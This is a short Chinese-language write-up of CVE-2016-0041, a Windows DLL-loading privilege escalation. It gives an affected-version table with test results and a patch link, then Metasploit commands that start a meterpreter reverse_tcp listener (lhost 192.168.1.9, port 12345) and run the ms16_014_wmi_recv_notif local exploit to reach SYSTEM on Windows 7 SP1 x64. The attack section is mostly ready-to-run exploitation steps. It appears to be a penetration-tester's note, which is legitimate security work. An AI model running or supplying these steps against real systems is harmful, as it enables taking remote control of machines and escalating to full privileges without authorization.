CVE-2016-0041

描述

错误处理了DLL加载,从而允许本地加载获得特权。

影响版本

ProductVersionUpdateEditionTested
Windows 10-
Windows 101511
Windows 7SP1:heavy_check_mark:
Windows 8.1
Windows Rt 8.1
Windows Server 2008SP2:heavy_multiplication_x:
Windows Server 2008R2SP1:heavy_multiplication_x:
Windows Server 2012:heavy_multiplication_x:
Windows Server 2012R2:heavy_multiplication_x:
Windows VistaSP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0041

利用方式

测试了网上能够找到的c++代码版本,Windows 7 x86/x64都会蓝屏,Windows Server 2008/2012所有版本都没反应,所有这边只能使用MSF版本。MSF版本中只有payload/windows/x64/meterpreter/reverse_tcp版本的反弹shell能够利用,payload/windows/meterpreter/reverse_tcp版本利用失败

测试系统Windows 7 sp1 x64,首先进行监听

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 12345
run

可以看到如下的反弹shell

CVE-2016-0041_win7_sp1_x64_01

接着使用提权漏洞

use exploit/windows/local/ms16_014_wmi_recv_notif
set session 2#你当前的session
run

CVE-2016-0041_win7_sp1_x64_02

可以看到我们最后成为了SYSTEM权限